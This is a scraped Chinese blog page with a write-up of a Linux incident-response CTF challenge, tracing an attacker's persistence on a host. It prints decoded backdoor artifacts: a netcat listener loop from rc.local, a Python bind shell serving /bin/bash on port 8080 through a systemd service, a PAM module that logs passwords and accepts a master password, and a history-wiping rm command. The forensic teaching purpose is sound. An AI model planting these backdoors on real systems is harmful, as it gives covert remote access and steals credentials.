当前位置: 首页 > news >正文

dedecms学校网站江西软件app开发公司

dedecms学校网站,江西软件app开发公司,企业网络营销方案策划书,开封网站建设兼职https://xj.edisec.net/challenges/95 11关做出拿到万能密码,ATMB6666,后面都在root权限下操作 1、主机后门用户名称:提交格式如:flag{backdoor} cat /etc/passwd,发现后门用户 flag{backdoor} 2、主机排查项中可以…

https://xj.edisec.net/challenges/95

11关做出拿到万能密码,ATMB6666,后面都在root权限下操作

1、主机后门用户名称:提交格式如:flag{backdoor}

cat /etc/passwd,发现后门用户

flag{backdoor}

2、主机排查项中可以发现到flag{}内以i开头的flag,如flag{ixxxxxxx}

ps -ef 发现flag{infoFl4g}

3、主机排查发现9999端口是通过哪个配置文件如何开机启动的,如/etc/crontab则填写/etc/crontab 的md5 ,提交方式示例:flag{md5}

/etc/rc.d/rc.local

echo d2hpbGUgdHJ1ZTtkbyBub2h1cCBuYyAtbHZwIDk5OTkgLWMgImZsYWd7aW5mb0ZsNGd9IiAyPiYxIDtzbGVlcCAxO2RvbmU7 | base64 -d | nohup bash &
 

base64解码为:

while true;do nohup nc -lvp 9999 -c "flag{infoFl4g}" 2>&1 ;sleep 1;done;

flag{cf8a978fe83579e2e20ec158524d8c06}

4、黑客3s做了记录所有用户的每次登陆的密码的手段,flag为黑客记录的登陆密码日志路径md5,提交方式示例:flag{md5(路径)}

拉到本地IDA打开:/usr/lib/x86_64-linux-gnu/security/pam_unix.so

/tmp/.sshlog

flag{8997d5a1b8dcca5a4be75962250959f7} 

5、给出使用了/bin/bash 的RCE后门进程名称+端口号 如进程名称为sshd,端口号为22,则flag{sshd22}

逐一排查systemctl启动配置文件存放位置
/etc/systemd/system
/usr/lib/systemd/system 
/lib/systemd/system

ls -lat /etc/systemd/system发现可疑文件docker-compose-app.service

查看 内容

继续查看 

 base64解码

import socket, subprocess# Create socket object
s = socket.socket()
s.bind(('', 8080))
s.listen(1)# Continuously accept connections
while True:conn, addr = s.accept()try:# Launch bash shell connected to this socketsubprocess.call(['/bin/bash'], stdin=conn, stdout=conn, stderr=conn)finally:# Ensure the connection is closed after useconn.close()

后门代码,开启的8080端口

netstat -tunlp

flag{python38080}

6、找出开机启动的后门服务名称MD5,提交flag{md5(服务名)}

docker-compose-app.service

flag{5213e47de16522f1dc3f9e9ecc0ab8b0}

7、渗透提权获得root目录下的flag

cat /root/flag

flag{ATMB_root}

8、黑客3s埋了一个flag在权限维持过程中的地方,可以发现flag{}括号内的首字母是c开头,如flag{cxxxxxxx}

find / -type f -newermt '2024-09-24 01:30:00' ! -newermt '2024-09-24 23:31:00' 2>/dev/null|grep -v docker

找出指定时间修改过的文件,逐一排查

cat -A /var/spool/cron/crontabs/root,发现flag,加-A 参数

 flag{cr0nt4b_IRfind}

9、黑客3s做了一个root用户执行cat命令就删除文件的操作,请发现删除了什么文件将文件名作为flag提交

flag{./bash_history}

10、黑客3s很执着清理痕迹,并做了一个持续删痕迹的手段,请发现手段并给出删除的完整黑客删除命令的md5,如flag{md5(rm -f /var/log/ssh.log >/dev/stdout)} 

下载/home/user/Noral.so,IDA打开反编译

 rm -rf ~/.bash_history >/dev/null 2>&1

MD5:flag{b0f531b39d88d4f603fc89bd4dd2c0aa}

11、黑客3s设置了一个万能密码后门使得这一个万能密码可以以所有用户身份登陆,也不影响原来密码使用。请发现这个万能密码,提交flag格式为flag{万能密码} 

find / -name 'pam_unix.so' 2>/dev/null

拉到本地IDA打开:/usr/lib/x86_64-linux-gnu/security/pam_unix.so

发现万能密码:ATMB6666

flag{ATMB6666}

参考文章


后渗透之linux持久化控制技术
https://www.ddosi.org/post-exploitation-linux-persistence-techniques/

http://www.yayakq.cn/news/520244/

相关文章:

  • 360浏览器打不开90设计网站荆门公司做网站
  • wordpress全站背景wordpress 音频播放器
  • 注册网站借钱平台犯不犯法公司注册网站官网
  • 公司网站建设哪家比较好网站架构师招聘
  • 旅游网站规划设计与建设做网站怎么写预算
  • 内网网站开发费用网站推广预算
  • 想学做网站要去哪里学运营推广是做什么的
  • 游戏网页设计html代码大全温州网络优化公司
  • php网站开发实训报告广州网站建设网站托管运营
  • 张家界市网站建设设计国外 平面设计网站
  • dw+如何做自适应网站县城乡建设局网站
  • 成都微信网站建设报价网站做的好不好
  • 湖北手机网站建设做网站不用tomcat行吗
  • 网站建设所需域名北京给网站做系统的公司名称
  • 做易拉宝设计的网站网站新闻收录问题
  • jsp淘宝客网站全平台内容系统免费
  • 做网站seo的公司哪家好浙江建设人力资源网
  • 做网站国外网站asp网站后台模板
  • 网站建设费支付请示网店代运营是做什么的
  • 湘潭网站制作建设怎么制作网站搜索窗口
  • 申请网址的网站辽宁网站建站系统哪家好
  • 门户网站开发jz190网站加alt属性对优化有影响吗
  • 响应式网站设计思路网站过度优化的表现
  • wordpress建设QQ登录网站建设与优化推广的话术
  • 高端网站建设南京wordpress 公用模块
  • 国外设计网站及介绍asp网站攻击
  • 网站 盈利模式百度秒收录软件
  • 巨鹿企业做网站中国保险公司排名前十名
  • 吉首做网站网站目标建设
  • 新手做网站最简单流程城市绿化建设英文网站